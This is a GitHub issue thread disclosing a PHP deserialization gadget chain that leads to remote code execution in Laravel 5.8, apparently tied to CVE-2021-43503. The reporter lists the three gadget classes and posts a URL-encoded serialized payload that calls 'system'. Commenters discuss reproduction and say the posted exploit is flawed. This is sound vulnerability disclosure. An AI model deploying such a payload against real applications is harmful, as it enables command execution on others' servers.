-
Notifications
You must be signed in to change notification settings - Fork 1
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
There is an unserialize POP vulnerability that can RCE #2
Comments
Hi @guoyanan1g, does this only affect Laravel 5? |
i haven't test the lower versions,maybe u can try to find if these functions are in the lower versions😂 |
Sorry, I was talking about the higher versions, we're currently using Laravel 8 |
i think it can't... |
hi, @guoyanan1g ,I have some trouble when reproducing the vulnerability 2、$c=new ClosureWrapper("dir"); |
Hi @PinkieChen, there is a similar CVE here: 1nhann/vulns#1 The comments hold a bit more information about replicating the issue, but seems to boil down to not unserialising unvalidated user input which is advised against by PHP already: |
sorry,the exp is just an example showing the call callee relationship and the order ,u can view it as a reference ,pls not use it as payload directly . |
Hi @guoyanan1g, I think you gave the exp is wrong and cannot be reproduced in my local. The problem is that the namespace Illuminate\Queue\Capsule{
class Manager{
protected $manager;
public function __construct($c)
{
$this->manager->method=$c; // This line
}
}
} In Laravel 5.8, Manager's public function __call($method, $parameters)
{
return $this->manager->$method(...$parameters);
} In your exp example, the value of I created a repo(https://github.com/kang8/CVE-2021-43503) to prove this. If you can create a directory(like |
@guoyanan1g , @kang8 Thanks in advance. |
In fact, I can't even reproduce the vulnerability. |
There is a php unserialize POP chain .
The files and the functions are :
①laravel5.8\vendor\laravel\framework\src\Illuminate\Routing\PendingResourceRegistration.php ,__destruct()
②laravel5.8\vendor\laravel\framework\src\Illuminate\Queue\Capsule\Manager.php,__call(),
③laravel5.8\vendor\mockery\mockery\library\Mockery\ClosureWrapper.php,__invoke().
The exp is :
//O%3A46%3A%22Illuminate%5CRouting%5CPendingResourceRegistration%22%3A5%3A%7Bs%3A12%3A%22%00%2A%00registrar%22%3BO%3A32%3A%22Illuminate%5CQueue%5CCapsule%5CManager%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00manager%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22method%22%3BO%3A22%3A%22Mockery%5CClosureWrapper%22%3A1%3A%7Bs%3A31%3A%22%00Mockery%5CClosureWrapper%00closure%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A7%3A%22%00%2A%00name%22%3BN%3Bs%3A13%3A%22%00%2A%00controller%22%3BN%3Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A0%3A%7B%7Ds%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3B%7D
The text was updated successfully, but these errors were encountered: